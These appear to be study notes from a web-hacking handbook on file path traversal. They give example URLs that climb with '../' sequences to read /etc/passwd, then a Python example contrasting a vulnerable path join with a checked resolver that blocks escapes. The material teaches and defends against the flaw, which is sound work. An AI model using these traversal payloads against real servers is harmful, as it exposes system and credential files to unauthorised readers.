黑客攻防技术宝典 — Notes 7: File Path Traversal

If you see a URL written like this:

   http://hello.com/file?=hi.doc

then you can try to see whether there is anything in the directories above hi.doc:

   http://hello.com/file?=../etc/passwd

   http://hello.com/file?=../../etc/passwd

   http://hello.com/file?=../../../etc/passwd

Keep going until you get the passwords.
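
On the server side, the handler behind such a URL has to resolve the requested name and confirm that it still sits inside the document directory. The following is an added example, not code from the original note or the book; the function names and the temporary directory layout are assumptions constructed for illustration.

```python
import os
import tempfile

def resolve_naive(base_dir, name):
    # Vulnerable pattern: the request value is joined as-is, so each ../
    # climbs one directory above base_dir.
    return os.path.normpath(os.path.join(base_dir, name))

def resolve_safe(base_dir, name):
    """Return the real path of name inside base_dir, or None if it escapes."""
    base = os.path.realpath(base_dir)
    # realpath collapses ../ and follows symlinks before the check is made.
    target = os.path.realpath(os.path.join(base, name))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:  # e.g. different drives on Windows
        inside = False
    # Only regular files inside base are served; the directory itself is not.
    return target if inside and os.path.isfile(target) else None

def demo():
    # Constructed layout: <root>/docs/hi.doc is public, <root>/etc/passwd is not.
    root = os.path.realpath(tempfile.mkdtemp())
    docs = os.path.join(root, "docs")
    secret = os.path.join(root, "etc", "passwd")
    os.makedirs(docs)
    os.makedirs(os.path.dirname(secret))
    for path in (os.path.join(docs, "hi.doc"), secret):
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    # A symlink inside docs that points outside must be rejected as well.
    os.symlink(os.path.dirname(secret), os.path.join(docs, "link"))
    requests = ["hi.doc", "../etc/passwd", "../../etc/passwd",
                "/etc/passwd", "link/passwd"]
    return root, {r: (resolve_naive(docs, r), resolve_safe(docs, r))
                  for r in requests}

if __name__ == "__main__":
    root, results = demo()
    for req, (naive, safe) in results.items():
        print(f"{req!r}: naive={naive} safe={safe}")
```

The naive join hands back the file outside the document directory for `../etc/passwd`, while the checked version returns `None` for every request that leaves it, including the absolute path and the symlink.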

   
